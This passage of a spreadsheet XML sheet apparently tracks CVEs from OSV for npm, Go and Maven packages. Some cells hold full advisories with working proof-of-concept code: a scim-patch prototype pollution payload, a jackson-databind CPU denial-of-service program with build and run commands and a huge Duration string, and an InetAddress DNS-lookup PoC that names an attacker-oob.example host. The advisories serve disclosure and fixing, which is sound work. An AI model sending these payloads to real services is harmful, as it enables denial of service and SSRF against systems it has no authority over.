          <t>OSV</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>npm:scim-patch</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr">
        <is>
          <t>0.9.2</t>
        </is>
      </c>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr"/>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>## Summary
Incomplete Prototype Pollution Fix Allows Mutation of Inherited Built-in Method Objects
`scim-patch` blocks direct dangerous path segments such as `__proto__`, `constructor`, and `prototype`, but still traverses inherited properties when applying SCIM patch paths.
An attacker who controls a SCIM PATCH operation can use paths such as `toString.polluted` to mutate shared built-in function objects, for example `Object.prototype.toString`.
## Impact
A malicious patch can add attacker-controlled properties to inherited built-in method objects. The impact is narrower than direct `Object.prototype` pollution, but the mutation is process-global and may affect application logic that reads properties from inherited methods.
## Details
Affected code paths:
- `navigate()` reads inherited properties via `schema[subPath]`
- `assign()` uses `key in obj`, which treats inherited properties as existing
Because inherited keys are followed, safe-looking path segments such as `toString` can resolve to shared built-in objects.
## PoC
```js
const assert = require("node:assert/strict");
const { scimPatch } = require("./lib/src/scimPatch");
const victim = {
  schemas: ["urn:ietf:params:scim:schemas:core:2.0:User"],
  userName: "alice",
  active: true,
  emails: [{ value: "alice@example.com", primary: true }],
  meta: { created: "x", lastModified: "x", resourceType: "User" }
};
try {
  assert.equal(({}).toString.scimPatchPolluted, undefined);
  scimPatch(victim, [
    { op: "add", path: "toString.scimPatchPolluted", value: "polluted" }
  ]);
  assert.equal(({}).toString.scimPatchPolluted, "polluted");
  console.log(({}).toString.scimPatchPolluted);
} finally {
  delete Object.prototype.toString.scimPatchPolluted;
}
```
Output:
```text
polluted
```
A no-path operation with a dotted value key is also affected:
```js
scimPatch(victim, [
  { op: "add", value: { "toString.noPathPolluted": "polluted" } }
]);
```
## Remediation
Do not traverse inherited properties while resolving patch paths. Use own-property checks such as `Object.hasOwn(obj, key)` and create missing containers only for safe own keys.
Keep the existing denylist for `__proto__`, `constructor`, and `prototype` as defense in depth.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61834</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63199</t>
        </is>
      </c>
      <c r="D181" s="5" t="inlineStr"/>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="inlineStr"/>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr"/>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Perses's missing authorization in datasource proxy allows cross-scope secret disclosure in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63199</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63405</t>
        </is>
      </c>
      <c r="D182" s="5" t="inlineStr"/>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="inlineStr"/>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr"/>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Pusher REST API Does Not Verify Request Body MD5 Enabling Signed-Request Replay with Arbitrary Body in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63405</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63406</t>
        </is>
      </c>
      <c r="D183" s="5" t="inlineStr"/>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="inlineStr"/>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/anycable/anycable-go</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr"/>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Telemetry Subsystem Contains Hardcoded Authentication Token and Transmits CLI Arguments Including Secrets in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63406</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63445</t>
        </is>
      </c>
      <c r="D184" s="5" t="inlineStr"/>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="inlineStr"/>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M184" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr"/>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>Perses's unvalidated project parameter enables filesystem path traversal in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63445</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63458</t>
        </is>
      </c>
      <c r="D185" s="5" t="inlineStr"/>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="inlineStr"/>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr">
        <is>
          <t>0.54.0-beta.3</t>
        </is>
      </c>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr"/>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Perses's project query parameter authorization bypass exposes cross-project resources in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63458</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6673</t>
        </is>
      </c>
      <c r="D186" s="5" t="inlineStr"/>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="inlineStr"/>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M186" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr"/>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't authenticate Atlassian Connect installed callbacks, allowing a remote unauthenticated attacker to inject a rogue sharedSecret in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6673</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D187" s="5" t="inlineStr"/>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr"/>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>### Summary
`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.
### Details
`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.
`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:
```java
protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}
```
Per the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `"P" + "9"×N + "Y"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`
  — `newDuration(value)` (TYPE_DURATION)
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`
  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)
- Registration (default, no opt-in):
  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`
  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)
- Contrast — correct length-guard pattern already used elsewhere in the library:
  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`
## Proof of Concept
PoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only "special" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}
```
Minimal HTTP-shaped payload (what an attacker sends):
```json
{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000
```
An `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.
`{ "at": "0000-01-01T00:00:00." + "9"×N }`.
## Execution Steps
The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).
```bash
# 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
#   If not already cached, fetch them once, e.g.:
#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
# 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
# 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
```
The `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.
Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.
## Reproduction Evidence
Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:
**digits = 5,000,000 (~5 MB payload):**
```
Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
**digits = 1,000,000 (~1 MB payload, for fast repeatability):**
```
Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
Interpretation: a normal `"P1Y"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).
## Impact
An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.
## Recommended Fix
Apply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:
1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before
   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs
   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),
   routing over-length input through `ctxt.handleWeirdStringValue(...)`.
2. Alternatively, validate the lexical form against a bounded regex and cap the digit count
   of each numeric component before delegating to `DatatypeFactory`.
3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must
   be length-limited at the transport layer.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71485</t>
        </is>
      </c>
      <c r="D188" s="5" t="inlineStr"/>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="inlineStr"/>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/centrifugal/centrifugo, Go:github.com/centrifugal/centrifugo/v3, Go:github.com/centrifugal/centrifugo/v4, Go:github.com/centrifugal/centrifugo/v5, Go:github.com/centrifugal/centrifugo/v6</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr">
        <is>
          <t>6.9.0</t>
        </is>
      </c>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr"/>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>Centrifugo: Client-forgeable headers emulation lets any client spoof headers forwarded to proxy backends in github.com/centrifugal/centrifugo</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71485</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D189" s="5" t="inlineStr"/>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M189" s="5" t="inlineStr">
        <is>
          <t>2.18.9, 2.21.5, 2.22.1, 3.1.5, 3.2.1</t>
        </is>
      </c>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr"/>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-54514 (GHSA-hgj6-7826-r7m5) fixed an eager-DNS-resolution / SSRF issue in jackson-databind's deserialization of `java.net.InetSocketAddress` by switching to `InetSocketAddress.createUnresolved(...)` (PR #5951, commit 1f5a1037, released in 2.18.8 / 2.21.4 / 3.1.4). That fix did not cover the sibling `java.net.InetAddress` branch in the very same `FromStringDeserializer.Std._deserialize()` switch statement, which still calls `InetAddress.getByName(value)` and therefore performs an eager forward DNS lookup on attacker-controlled input at deserialization time. The fix is incomplete: the same vulnerability class remains reachable through `InetAddress`.
### Details
File: src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
Sibling cases in the same switch:
- Line 357-358 (UNFIXED):
    case STD_INET_ADDRESS:
        return InetAddress.getByName(value);     // eager forward DNS lookup
- Line 359-381 + helper at 494-496 (FIXED by PR #5951):
    protected InetSocketAddress _inetSocketAddress(String host, int port) {
        // 05-May-2026, tatu: [databind#5951] Prevent DNS lookup:
        return InetSocketAddress.createUnresolved(host, port);   // no DNS
    }
`InetAddress` is a registered standard string-like scalar type (FromStringDeserializer.types() line 73; findDeserializer() maps it to STD_INET_ADDRESS at line 119-120). Any value deserialized into an `InetAddress`-typed target — a plain POJO field, a polymorphic subtype, or a default-typing-permitted slot — reaches `InetAddress.getByName(attackerControlledString)`, which invokes the OS/JVM resolver and performs forward DNS resolution before any application validation.
The parent fix's own added unit test asserts `address.isUnresolved()` with the comment "should NOT resolve address", confirming that performing DNS resolution during deserialization is precisely the behavior being treated as the vulnerability. The InetAddress branch still violates that property.
Verified against the FIXED released artifact (jackson-databind 2.18.8, from Maven Central): decompiled bytecode shows the InetSocketAddress branch now routes through `_inetSocketAddress -&gt; createUnresolved`, while `InetAddress.getByName` is still emitted unchanged in the InetAddress branch.
### PoC
Lab-only, zero network egress. Run against the fixed jackson-databind 2.18.8.
A custom JDK InetAddressResolver SPI (Java 18+) counts forward lookups locally and answers with loopback, so no traffic leaves the host:
    ObjectMapper m = new ObjectMapper();
    // InetSocketAddress (patched): 0 resolver lookups, isUnresolved=true
    m.readValue("\"internal-metadata.attacker-oob.example:8080\"", InetSocketAddress.class);
    // InetAddress (unpatched sibling): 1 resolver lookup on the attacker host
    m.readValue("\"internal-metadata.attacker-oob.example\"", InetAddress.class);
Observed output (jackson 2.18.8):
    [A] InetSocketAddress  isUnresolved=true  resolverLookups=0  lastHost=null
    [B] InetAddress        value=localhost/127.0.0.1  resolverLookups=1  lastHost=internal-metadata.attacker-oob.example
A standalone variant (no SPI) using an RFC-6761 `.invalid` canary host shows the same: deserializing into InetAddress raises UnknownHostException (the OS resolver was invoked), while InetSocketAddress stays unresolved. Full source in PocResolverCount.java and PocInetAddressIncompleteFix.java.
